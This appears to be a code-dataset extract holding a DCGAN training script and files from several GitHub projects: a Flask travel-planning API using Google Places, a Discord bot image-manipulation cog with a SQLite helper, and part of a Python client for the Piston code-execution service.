X.reshape(-1, npx, npy) return X model_dir = 'models/' samples_dir = 'samples/' if not os.path.exists('logs/'): os.makedirs('logs/') if not os.path.exists(model_dir): os.makedirs(model_dir) if not os.path.exists(samples_dir): os.makedirs(samples_dir) relu = activations.Rectify() sigmoid = activations.Sigmoid() lrelu = activations.LeakyRectify() bce = T.nnet.binary_crossentropy gifn = inits.Normal(scale=0.02) difn = inits.Normal(scale=0.02) npx_ = npx / 4 gw = gifn((nz+ny, ngfc), 'gw') gw2 = gifn((ngfc+ny, ngf*2*npx_*npx_), 'gw2') gw3 = gifn((ngf*2+ny, ngf, 5, 5), 'gw3') gwx = gifn((ngf+ny, nc, 5, 5), 'gwx') dw = difn((ndf, nc+ny, 5, 5), 'dw') dw2 = difn((ndf*2, ndf+ny, 5, 5), 'dw2') dw3 = difn((ndf*2*npx_*npx_+ny, ndfc), 'dw3') dwy = difn((ndfc+ny, 1), 'dwy') gen_params = [gw, gw2, gw3, gwx] discrim_params = [dw, dw2, dw3, dwy] def gen(Z, Y, w, w2, w3, wx): yb = Y.dimshuffle(0, 1, 'x', 'x') Z = T.concatenate([Z, Y], axis=1) h = relu(batchnorm(T.dot(Z, w))) h = T.concatenate([h, Y], axis=1) h2 = relu(batchnorm(T.dot(h, w2))) h2 = h2.reshape((h2.shape[0], ngf*2, npx_, npx_)) h2 = conv_cond_concat(h2, yb) h3 = relu(batchnorm(deconv(h2, w3, subsample=(2, 2), border_mode=(2, 2)))) h3 = conv_cond_concat(h3, yb) x = sigmoid(deconv(h3, wx, subsample=(2, 2), border_mode=(2, 2))) return x def discrim(X, Y, w, w2, w3, wy): yb = Y.dimshuffle(0, 1, 'x', 'x') X = conv_cond_concat(X, yb) h = lrelu(dnn_conv(X, w, subsample=(2, 2), border_mode=(2, 2))) h = conv_cond_concat(h, yb) h2 = lrelu(batchnorm(dnn_conv(h, w2, subsample=(2, 2), border_mode=(2, 2)))) h2 = T.flatten(h2, 2) h2 = T.concatenate([h2, Y], axis=1) h3 = lrelu(batchnorm(T.dot(h2, w3))) h3 = T.concatenate([h3, Y], axis=1) y = 
sigmoid(T.dot(h3, wy)) return y def load_model(model_path): gen_params_values = joblib.load(model_path + '_gen_params.jl') for p, v in izip(gen_params, gen_params_values): p.set_value(v) discrim_params_values = joblib.load(model_path + '_discrim_params.jl') for p, v in izip(discrim_params, discrim_params_values): p.set_value(v) X = T.tensor4() Z = T.matrix() Y = T.matrix() gX = gen(Z, Y, *gen_params) p_real = discrim(X, Y, *discrim_params) p_gen = discrim(gX, Y, *discrim_params) d_cost_real = bce(p_real, T.ones(p_real.shape)).mean() d_cost_gen = bce(p_gen, T.zeros(p_gen.shape)).mean() g_cost_d = bce(p_gen, T.ones(p_gen.shape)).mean() d_cost = d_cost_real + d_cost_gen g_cost = g_cost_d cost = [g_cost, d_cost, g_cost_d, d_cost_real, d_cost_gen] lrt = sharedX(lr) d_updater = updates.Adam(lr=lrt, b1=b1, regularizer=updates.Regularizer(l2=l2)) g_updater = updates.Adam(lr=lrt, b1=b1, regularizer=updates.Regularizer(l2=l2)) d_updates = d_updater(discrim_params, d_cost) g_updates = g_updater(gen_params, g_cost) updates = d_updates + g_updates print 'COMPILING' t = time() _train_g = theano.function([X, Z, Y], cost, updates=g_updates) _train_d = theano.function([X, Z, Y], cost, updates=d_updates) _gen = theano.function([Z, Y], gX) print '%.2f seconds to compile theano functions'%(time()-t) cols = 10 tr_idxs = np.arange(len(trX)) trX_vis = np.asarray([[trX[i] for i in py_rng.sample(tr_idxs[trY==y], cols)] for y in range(ny)]).reshape(ny * cols, -1) trX_vis = inverse_transform(transform(trX_vis)) grayscale_grid_vis(trX_vis, (ny, cols), 'samples/test.png') ############ # set up targets normally steps = 6 numtargets = 9 #This is how many letter you will count start = 1 targets = np.asarray([[i+start for _ in range(steps)] for i in range(numtargets)]) sample_ymb = floatX(OneHot(targets.flatten(), ny)) # set up random z sample_zmb = floatX(np_rng.uniform(-1., 1., size=(numtargets * steps, nz))) def gen_samples(n, nbatch=128): samples = [] labels = [] n_gen = 0 for i in range(n/nbatch): ymb = floatX(OneHot(np_rng.randint(0, ny, nbatch), ny)) zmb = floatX(np_rng.uniform(-1., 1., size=(nbatch, nz))) xmb = _gen(zmb, ymb) samples.append(xmb) labels.append(np.argmax(ymb, axis=1)) n_gen += len(xmb) n_left = n-n_gen ymb = floatX(OneHot(np_rng.randint(0, ny, n_left), ny)) zmb = floatX(np_rng.uniform(-1., 1., size=(n_left, nz))) xmb = _gen(zmb, ymb) samples.append(xmb) labels.append(np.argmax(ymb, axis=1)) return np.concatenate(samples, axis=0), np.concatenate(labels, axis=0) f_log = open('logs/log.ndjson', 'wb') log_fields = ['n_epochs', 'n_updates', 'n_examples', 'n_seconds','1k_va_nnc_acc', '10k_va_nnc_acc', '100k_va_nnc_acc','1k_va_nnd','10k_va_nnd','100k_va_nnd','g_cost','d_cost'] n_updates = 0 n_check = 0 n_epochs = 0 n_updates = 0 n_examples = 0 t = time() for epoch in range(1, niter+niter_decay+1): trX, trY = shuffle(trX, trY) for imb, ymb in tqdm(iter_data(trX, trY, size=nbatch), total=ntrain/nbatch): imb = transform(imb) ymb = floatX(OneHot(ymb, ny)) zmb = floatX(np_rng.uniform(-1., 1., size=(len(imb), nz))) if n_updates % (k+1) == 0: cost = _train_g(imb, zmb, ymb) else: cost = _train_d(imb, zmb, ymb) n_updates += 1 n_examples += len(imb) if (epoch-1) % 5 == 0 & False: g_cost = float(cost[0]) d_cost = float(cost[1]) gX, gY = gen_samples(100000) gX = gX.reshape(len(gX), -1) va_nnc_acc_1k = nnc_score(gX[:1000], gY[:1000], vaX, vaY, metric='euclidean') va_nnc_acc_10k = nnc_score(gX[:10000], gY[:10000], vaX, vaY, metric='euclidean') va_nnc_acc_100k = nnc_score(gX[:100000], gY[:100000], vaX, vaY, 
metric='euclidean') va_nnd_1k = nnd_score(gX[:1000], vaX, metric='euclidean') va_nnd_10k = nnd_score(gX[:10000], vaX, metric='euclidean') va_nnd_100k = nnd_score(gX[:100000], vaX, metric='euclidean') log = [n_epochs, n_updates, n_examples, time()-t, va_nnc_acc_1k, va_nnc_acc_10k, va_nnc_acc_100k, va_nnd_1k, va_nnd_10k, va_nnd_100k, g_cost, d_cost] print '%.0f %.2f %.2f %.2f %.4f %.4f %.4f %.4f %.4f'%(epoch, va_nnc_acc_1k, va_nnc_acc_10k, va_nnc_acc_100k, va_nnd_1k, va_nnd_10k, va_nnd_100k, g_cost, d_cost) f_log.write(json.dumps(dict(zip(log_fields, log)))+'\n') f_log.flush() n_epochs += 1 print "done epoch "+str(n_epochs); if (-1+n_epochs) % 10 == 0: samples = np.asarray(_gen(sample_zmb, sample_ymb)) grayscale_grid_vis(inverse_transform(samples), (samples.shape[0] / steps, steps), 'samples/%d.png'%(n_epochs)) if n_epochs > niter: lrt.set_value(floatX(lrt.get_value() - lr/niter_decay)) if n_epochs in [50, 100, 150, 200, 250, 300, 350, 400, 450, 500]: joblib.dump([p.get_value() for p in gen_params], 'models/%d_gen_params.jl'%(n_epochs)) joblib.dump([p.get_value() for p in discrim_params], 'models/%d_discrim_params.jl'%(n_epochs)) #load_model('/root/dcgan_code/mnist/models/cond_dcgan/242_lr2') #samples = np.asarray(_gen(sample_zmb, sample_ymb)) #grayscale_grid_vis(inverse_transform(samples), (samples.shape[0]/steps, steps), 'samples/%s/hi2%d.png'%(n_epochs)) ```
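The commented-out lines at the end of the script hint at how a saved checkpoint is sampled; a slightly fuller sketch, reusing the script's own globals (`load_model`, `_gen`, `OneHot`, `grayscale_grid_vis`, `inverse_transform`, `ny`, `nz`) and assuming a checkpoint saved at epoch 500:

```python
# Sketch only: the path and epoch number are placeholders.
load_model('models/500')     # reads models/500_gen_params.jl and models/500_discrim_params.jl

rows, cols = ny, 8           # one row of samples per character class
ymb = floatX(OneHot(np.repeat(np.arange(ny), cols), ny))
zmb = floatX(np_rng.uniform(-1., 1., size=(rows * cols, nz)))

samples = np.asarray(_gen(zmb, ymb))
grayscale_grid_vis(inverse_transform(samples), (rows, cols), 'samples/grid.png')
```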
{ "source": "aaalana/SENG2021-Geographically", "score": 3 }
#### File: code/resources/parse.py ```python import requests from flask_restful import Resource, Api from flask import Flask, request, render_template #have to do error handing class Summary(Resource): def getPlaceSummary(place): S = requests.Session() URL = "https://en.wikipedia.org/api/rest_v1/page/summary/"+ place.replace(" ", "_") print(URL) TITLE = place PARAMS = { 'action': "parse", 'page': TITLE, 'format': "json" } R = S.get(url=URL) DATA = R.json() if (DATA["title"] == 'Not found.'): print ("No information found") return "No information found" return(DATA["extract"]) ``` #### File: code/resources/Places.py ```python from flask_restful import Resource, Api from flask import Flask, request, render_template import requests, json, geocoder APIKEY = '<KEY>' class Places(Resource): def get(self): data = findRestaurant(getCurrentLocation()) return data #find restaurants within 1000 of a location #ideally this would show restaurants within 5 minute drive of a route def findRestaurant (loc): radius = 1000 lat, lng = loc type = "restaurant" url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={lat},{lng}&radius={radius}&type={type}&key={APIKEY}".format(lat = lat, lng = lng, radius = radius, type = type,APIKEY = APIKEY) print(url) response = requests.get(url) res = json.loads(response.text) #prints out info in a simplified format for result in res["results"]: info = ";".join(map(str,[result["name"],result["geometry"]["location"]["lat"],result["geometry"]["location"]["lng"],result.get("rating",0),result["place_id"]])) print(info) return res #returns locations of the first page of google for sydney tourist attractions def findPointsOfInterest(): location = "sydney" url = "https://maps.googleapis.com/maps/api/place/textsearch/json?query={location}+points+of+interest&language=en&key={APIKEY}".format(location=location, APIKEY=APIKEY) response = requests.get(url) res = json.loads(response.text) for result in res["results"]: print(result["name"]) print(res["results"]) return res["results"] #get current location def getCurrentLocation(): g = geocoder.ip('me') print("location is") print(g) lat = str(g.latlng[0]) lng = str(g.latlng[1]) return lat, lng def getPhoto(location): refID = location[0]["photos"][0]["photo_reference"] width = 400 url = "https://maps.googleapis.com/maps/api/place/photo?maxwidth={width}&photoreference={refID}&key={APIKEY}".format(width = width, refID = refID, APIKEY = APIKEY) print(url) return url def getPlacesInfo(locationstr): locationstr = locationstr.replace(' ','%20' ) url = "https://maps.googleapis.com/maps/api/place/textsearch/json?query={locationstr}&key={APIKEY}".format(locationstr = locationstr, APIKEY = APIKEY) print(url) response = requests.get(url) res = json.loads(response.text) return (res["results"]) def getPlacesID(locationstr): locationstr = locationstr.replace(' ','%20' ) url = "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input={locationstr}&inputtype=textquery&fields=formatted_address,name,rating,place_id&locationbias=circle:[email protected],151.0281859&key={APIKEY}".format(locationstr = locationstr, APIKEY = APIKEY) print(url) response = requests.get(url) res = json.loads(response.text) print(res["candidates"][0]["place_id"]) return (res) def getPhotoRecs(locations): lst = [] k = 0 for pn in locations: k = k + 1 if k == 1: continue if k == 10: break d = {} refID =pn["photos"][0]["photo_reference"] name = pn["name"] print(name) width = 1000 url = 
"https://maps.googleapis.com/maps/api/place/photo?maxwidth={width}&photoreference={refID}&key={APIKEY}".format(width = width, refID = refID, APIKEY = APIKEY) d['src'] = url d['name'] = name lst.append(d) print(lst) return json.dumps(lst) #print(getCurrentLocation()) #findRestaurant(getCurrentLocation()) #Places.findPointsOfInterest() #locations = Places.findPointsOfInterest() #Places.getPhotoRecs(locations) #print(location["photos"][0]["photo_reference"]) #id = getPhotoId(findPointsOfInterest()) #getPhotoLocation(id) #info = Places.getPlacesInfo("Darling Harbour") #Places.getPhoto(info) Places.getPlacesID("Broken Hill") ``` #### File: SENG2021-Geographically/code/run.py ```python from flask import Flask, render_template from flask_restful import reqparse, abort, Api, Resource from flask_cors import CORS from resources.Places import * from resources.Routing import * from resources.parse import * from resources.Weather import * from resources.Music import * from resources.Playlist import * from pymongo import MongoClient ### Import resources from resources.users import Users ### Set up/connect to the Mongo Database client = MongoClient("mongodb://localhost:27017/") db = client.geographicallyDB users = db.users ### Set 'flask' environment settings app = Flask(__name__) api = Api(app) app.config.from_object(__name__) # enable CORS CORS(app) route = [ { 'start': Places.getCurrentLocation(), 'startID': Places.getCurrentLocation(), 'end': "Canberra", 'endID': Places.getPlacesID("Canberra")["candidates"][0]["place_id"] } ] #we should get a json returning from the other functions and call it from here recommendations = Places.findPointsOfInterest() locationphotos = Places.getPhotoRecs(recommendations) print(locationphotos) locations = json.loads(locationphotos) #print(findRoute) class Recommendations(Resource): def get(self): return locations class Routing(Resource): def get(self): print("dist") print(route) if not route[0]['start']: print(Places.getCurrentLocation()) findRoute = Route.findRouteInfo(Places.getCurrentLocation(), route[0]['endID']) else: print("start id") print(route[0]['startID']) findRoute = Route.findRouteInfo(route[0]['startID'], route[0]['endID']) return jsonify(findRoute) def put(self,start,end): findRoute = Route.findRouteInfo(start, end) return findRoute class LocSummary(Resource): def get(self): summary = Summary.getPlaceSummary(route[0]['end']) return summary class DestinationPhoto(Resource): def get(self): location = route[0]['end'] print(location) info = Places.getPlacesInfo(location) print(info) return Places.getPhoto(info) class CurrentLocation(Resource): def get(self): lat,lng = Places.getCurrentLocation() print(lat) print(lng) return jsonify( { 'lat': lat, 'lng': lng }) class Location(Resource): def get(self): print('hi') print(route) return jsonify({ 'status': 'success', 'location': route }) def post(self): location = {'start':'help', 'dest' : 'end'} location = request.get_json() route[0]['start'] = location['start'] route[0]['end'] = location['end'] print("LOCATION") print(route[0]['end']) if route[0]['start']: route[0]['startID'] = Places.getPlacesID(location['start'])["candidates"][0]["place_id"] route[0]['endID'] = Places.getPlacesID(location['end'])["candidates"][0]["place_id"] print(route[0]['endID']) summary = Summary.getPlaceSummary(location["end"]) print(summary) return location class LocWeather(Resource): def get(self): locationID = Weather.getLocationID(route[0]['end'])[0]["id"] weather = Weather.getWeather(locationID) return weather class 
Spotify(Resource): def get(self): music = Music.searchPlaylist(route[0]['end']) print(music) return music class genPlaylist(Resource): def get(self): locationID = Weather.getLocationID(route[0]['end'])[0]["id"] weather = Weather.getWeather(locationID) print(locationID) Playlist.createPlaylist(weather["forecasts"]["weather"]["days"][0]["entries"][0]["precis"], route[0]['end']) return weather api.add_resource(Recommendations, '/recommendation') api.add_resource(Routing, '/trips') api.add_resource(LocSummary, '/trips/summary') api.add_resource(DestinationPhoto, '/trips/photo') api.add_resource(Location, '/location') api.add_resource(CurrentLocation, '/current') api.add_resource(LocWeather, '/trips/weather') api.add_resource(Spotify, '/trips/music') api.add_resource(genPlaylist, '/trips/genplaylists') @app.route('/') def test_page(): return Recommendations @app.route('/location') def sendInfo(): print("test") details = request.get_json() print(details["end"]) summary = Summary.getPlaceSummary("Canberra") print(details) print(summary) return jsonify(details) ### Add the Flask_RESTful resources here api.add_resource(Users, '/Users') ### Start the server, (called through 'serverStart' script) if __name__ == '__main__': app.run() ```
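With the Flask app above running locally (Flask's default bind is http://127.0.0.1:5000), the trip resources can be exercised with plain `requests`; the city names are placeholders.

```python
import requests

BASE = "http://127.0.0.1:5000"   # assumes the default Flask host/port

# Store a trip; the Location resource fills in the Google place IDs for `route`.
requests.post(f"{BASE}/location", json={"start": "Sydney", "end": "Canberra"})

print(requests.get(f"{BASE}/trips").json())           # route info between start and end
print(requests.get(f"{BASE}/trips/summary").json())   # Wikipedia extract for the destination
print(requests.get(f"{BASE}/trips/weather").json())   # forecast for the destination
```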
{ "source": "AaalbatrossGuy/DeltaDiscordBot", "score": 3 }
#### File: DeltaDiscordBot/Cogs/Image_manipulation.py ```python import discord import requests from discord.ext import commands from io import BytesIO from PIL import Image, ImageOps, ImageFilter from asyncdagpi import Client, ImageFeatures class ImageManipulation(commands.Cog): def __init__(self, client): self.client = client self.dagpi = Client("<KEY>") @commands.command(name="bw_u") async def black_and_white_user(self, ctx, *, member: discord.Member = None): member = member or ctx.message.author avatar_url = member.avatar_url_as(format='jpeg') image = Image.open(requests.get(url=avatar_url, stream=True).raw).convert("L") with BytesIO() as image_bytes: image.save(image_bytes, 'jpeg') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.jpeg")) @commands.command(name="negative_u") async def negative_user(self, ctx, *, member: discord.Member = None): member = member or ctx.message.author avatar_url = member.avatar_url_as(format='jpeg') image = Image.open(requests.get(url=avatar_url, stream=True).raw) image_inverted = ImageOps.invert(image) with BytesIO() as image_bytes: image_inverted.save(image_bytes, 'jpeg') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.jpeg")) @commands.command(name="blur_u") async def blur_user(self, ctx, radius: int, *, member: discord.Member = None): member = member or ctx.message.author avatar_url = member.avatar_url_as(format='jpeg') image = Image.open(requests.get(url=avatar_url, stream=True).raw) blurred_image = image.filter(ImageFilter.GaussianBlur(radius=int(radius))) with BytesIO() as image_bytes: blurred_image.save(image_bytes, 'jpeg') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.jpeg")) @commands.command(name="bw_f") async def black_and_white_file(self, ctx): image = ctx.message.attachments[0].url main_image = Image.open(requests.get(url=image, stream=True).raw).convert("L") with BytesIO() as image_bytes: main_image.save(image_bytes, 'jpeg') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.jpeg")) @commands.command(name="negative_f") async def negative_file(self, ctx): image = ctx.message.attachments[0].url image = Image.open(requests.get(url=image, stream=True).raw).convert("RGB") main_image = ImageOps.invert(image) with BytesIO() as image_bytes: main_image.save(image_bytes, 'jpeg') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.jpeg")) @commands.command(name="blur_f") async def blur_file(self, ctx, radius: int): image = ctx.message.attachments[0].url image = Image.open(requests.get(url=image, stream=True).raw) main_image = image.filter(ImageFilter.GaussianBlur(radius=int(radius))) with BytesIO() as image_bytes: main_image.save(image_bytes, 'png') image_bytes.seek(0) await ctx.channel.send( file=discord.File(fp=image_bytes, filename="image.png")) @commands.command() async def wasted(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") base_url = f"https://some-random-api.ml/canvas/wasted?avatar={url}" await ctx.channel.send(base_url) @commands.command() async def trigger(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url= member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.triggered(), str(url)) file = discord.File(fp=img.image, filename=f"triggered.{img.format}") await 
ctx.channel.send(file=file) @commands.command() async def magic(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.magik(), str(url)) file = discord.File(fp=img.image, filename=f"magic.{img.format}") await ctx.channel.send(file=file) @commands.command() async def pixel(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.pixel(), str(url)) file = discord.File(fp=img.image, filename=f'pixel.{img.format}') await ctx.channel.send(file=file) @commands.command() async def angel(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.angel(), str(url)) file = discord.File(fp=img.image, filename=f"angel.{img.format}") await ctx.channel.send(file=file) @commands.command() async def devil(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.satan(), str(url)) file = discord.File(fp=img.image, filename=f"devil.{img.format}") await ctx.channel.send(file=file) @commands.command() async def windel(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.delete(), str(url)) file = discord.File(fp=img.image, filename=f'delete.{img.format}') await ctx.channel.send(file=file) @commands.command() async def hitler(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.hitler(), str(url)) file = discord.File(fp=img.image, filename=f'hitler.{img.format}') await ctx.channel.send(file=file) @commands.command() async def stringify(self, ctx, *, member:discord.Member = None): member = member or ctx.message.author url = member.avatar_url_as(format="png") img = await self.dagpi.image_process(ImageFeatures.stringify(), str(url)) file = discord.File(fp=img.image, filename = f"stringify.{img.format}") await ctx.channel.send(file=file) #Error Handlers @black_and_white_user.error async def bw_user_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @negative_user.error async def negative_u_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @blur_user.error async def blur_u_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) if isinstance(error, commands.MissingRequiredArgument): await 
ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Arguments", description="```ini\nMake sure you have run the command providing the [blur radius] and the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_teal())) @black_and_white_file.error async def bw_f_error_handling(self, ctx, error): if isinstance(error, commands.CommandInvokeError): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Attachment", description="```prolog\nMake sure you have run the command providing the File/Image as an Attachment```", timestamp=ctx.message.created_at, color=discord.Color.dark_teal())) @negative_file.error async def negative_f_error_handling(self, ctx, error): if isinstance(error, commands.CommandInvokeError): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Attachment", description="```prolog\nMake sure you have run the command providing the File/Image as an Attachment```", timestamp=ctx.message.created_at, color=discord.Color.dark_teal())) @blur_file.error async def blur_f_error_handling(self, ctx, error): if isinstance(error, commands.CommandInvokeError): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Missing Attachment", description="```prolog\nMake sure you have run the command providing the File/Image as an Attachment```", timestamp=ctx.message.created_at, color=discord.Color.dark_teal())) @wasted.error async def wasted_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @trigger.error async def trigger_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @magic.error async def magic_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @pixel.error async def pixel_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @angel.error async def angel_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @devil.error async def devil_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, 
color=discord.Color.dark_red())) @windel.error async def windel_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @hitler.error async def hitler_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) @stringify.error async def stringify_error_handling(self, ctx, error): if isinstance(error, commands.MemberNotFound): await ctx.send(embed=discord.Embed(title="<:hellno:871582891585437759> Member Not Found", description="```ini\nMake sure you have run the command providing the [username]```", timestamp=ctx.message.created_at, color=discord.Color.dark_red())) def setup(client): client.add_cog(ImageManipulation(client)) ``` #### File: DeltaDiscordBot/lib/db.py ```python from os.path import isfile from sqlite3 import connect db_path = "./Data/database.db" buildpath = "./Data/build.sql" connectdb = connect(db_path, check_same_thread=False) cursor = connectdb.cursor() def with_commit(func): def inner(*args, **kwargs): func(*args, **kwargs) commit() return inner @with_commit def build(): if isfile(buildpath): scriptexec(buildpath) def commit(): connectdb.commit() def closedb(): connectdb.close() def field(command, *values): cursor.execute(command, tuple(values)) if (fetch := cursor.fetchone()) is not None: return fetch[0] def record(command, *values): cursor.execute(command, tuple(values)) return cursor.fetchone() def records(command, *values): cursor.execute(command, tuple(values)) return cursor.fetchall() def column(command, *values): cursor.execute(command, tuple(values)) return [item[0] for item in cursor.fetchall()] def execute(command, *values): cursor.execute(command, tuple(values)) def multiexec(command, value_s): cursor.executemany(command, value_s) def scriptexec(path): with open(path, "r", encoding="utf-8") as file: cursor.executescript(file.read()) ```
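The `lib/db.py` helpers above wrap a single shared SQLite connection; a usage sketch follows (the `prefixes` table is illustrative and not taken from the bot's `build.sql`, and `./Data/` must already exist because the connection is opened at import time).

```python
from lib import db

db.build()   # executes ./Data/build.sql if that file exists

db.execute("CREATE TABLE IF NOT EXISTS prefixes (guild_id INTEGER PRIMARY KEY, prefix TEXT)")
db.execute("INSERT OR REPLACE INTO prefixes (guild_id, prefix) VALUES (?, ?)", 123456789, "!")
db.commit()

print(db.field("SELECT prefix FROM prefixes WHERE guild_id = ?", 123456789))   # "!"
print(db.records("SELECT * FROM prefixes"))

db.closedb()
```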
{ "source": "AaalbatrossGuy/pistonpy", "score": 2 }
#### File: src/pistonpy/models.py ```python import requests, json from .exceptions import PistonError, MultipleLanguagesFound from .extensions import lang_extensions as le __all__ = ("GetOutput", "Extensions",) class GetOutput: def __init__(self, payload: dict) -> None: self._endpoint = "https://emkc.org/api/v2/piston/execute" self.payload = payload def parse_output(self): output = requests.request("POST", url=self._endpoint, data = json.dumps(self.payload)) output = output.json() if output.get('message'): raise PistonError(output.get('message')) else: return output class Extensions: def __init__(self, language: str, payload: list) -> None: self.payload = payload self.language = language @property def check_files(self): check_bool = [] file_extensions = [i.split('.')[1] for i in self.payload] for file in file_extensions: check_bool.append(True) if file in le[self.language] and file == le[self.language] else check_bool.append(False) #print(check_bool) if all(check_bool): return True, None else: return False, file_extensions ``` #### File: src/pistonpy/pistonapp.py ```python import requests, json from typing import Optional from .exceptions import CodeNotFound, LanguageNotFound, CodeFormatNotFound, NotAFile, MultipleLanguagesFound from .models import GetOutput, Extensions __all__ = ('PistonApp',) class PistonApp(): """The class to use while working with other code or creating applications or discord bots.""" def __init__(self, embed: str = 'app') -> None: """ :param embed: app - work as integrated. Default is set to app """ self.embed = embed self._endpoint = "https://emkc.org/api/v2/piston" def __repr__(self) -> str: return "<pistonpy.PistonApp>" @property def raw(self) -> dict: url = self._endpoint + "/runtimes" response = requests.request("GET", url) data = response.json() return data @property def languages(self) -> dict: url = self._endpoint + "/runtimes" response = requests.request("GET", url) data = response.json() language = [] version = [] for i in data: language.append(i['language']) version.append(i['version']) dic = dict(zip(language, version)) return dic @property def aliases(self) -> dict: url = self._endpoint + "/runtimes" response = requests.request("GET", url) data = response.json() language = [] alias = [] for i in data: language.append(i['language']) alias.append(i['aliases']) dic = dict(zip(language, alias)) return dic def run( self, language: str, version: str = "*", files: Optional[list] = [], code: Optional[str] = "", args: Optional[list] = [], input: Optional[str] = "", compile_timeout: Optional[int] = 10_000, run_timeout: Optional[int] = 3_000, compile_memory_limit: Optional[int] = -1, run_memory_limit: Optional[int] = -1, ) -> list: """Main Code Execution""" main_code = '' formattedfiles = [i.split('.')[0] for i in files] file_extensions = [i.split('.')[1] for i in files] bool, message = Extensions(language=language, payload=files).check_files if files: if bool: pass else: raise MultipleLanguagesFound(f"Files of multiple languages found: {message}") if not code and not files: print('running CodeNotFound') raise CodeNotFound("No code provided to run") elif code and files: print('running CodeFormatNotFound') raise CodeFormatNotFound("Cannot choose whether to run raw code or code from file/s") else: if code: main_code = [{"name" : '', "content" : code}] if files and len(files) == 1: files_content = [] for file in files: try: with open(file, mode="r") as f: content = f.read() files_content.append({"name": file, "content": content}) except FileNotFoundError: raise 
FileNotFoundError(f"{file} not found.") main_code = files_content if files and 1 < len(files) < 5 and 'py' in file_extensions: files_content = [] for file in files: files_content.append({"name" : "main.py", "content" : f"import {', '.join(formattedfiles)}"}) try: with open(file, mode="r") as f: content = f.read() files_content.append({"name" : file, "content" : content}) except FileNotFoundError: raise FileNotFoundError(f"{file} not found.") main_code = files_content # print(f"main_code = {main_code}") if files and 1 < len(files) <= 5: files_content = [] response = [] for file in files: try: with open(file, mode="r") as f: content = f.read() files_content.append({"name" : file, "content" : content}) except FileNotFoundError: raise FileNotFoundError(f"{file} not found.") for data in files_content: temp = [] temp.append(json.dumps(data)) multiple_files = { 'language' : language, 'version' : version, 'files' : json.dumps(temp), 'args' : args, 'stdin' : input, 'compile_timeout' : compile_timeout, 'run_timeout' : run_timeout, 'compile_memory_limit' : compile_memory_limit, 'run_memory_limit' : run_memory_limit } print(f"Multiple Files - {multiple_files}") response.append(GetOutput(multiple_files).parse_output()) return response payload = { 'language' : language, 'version' : 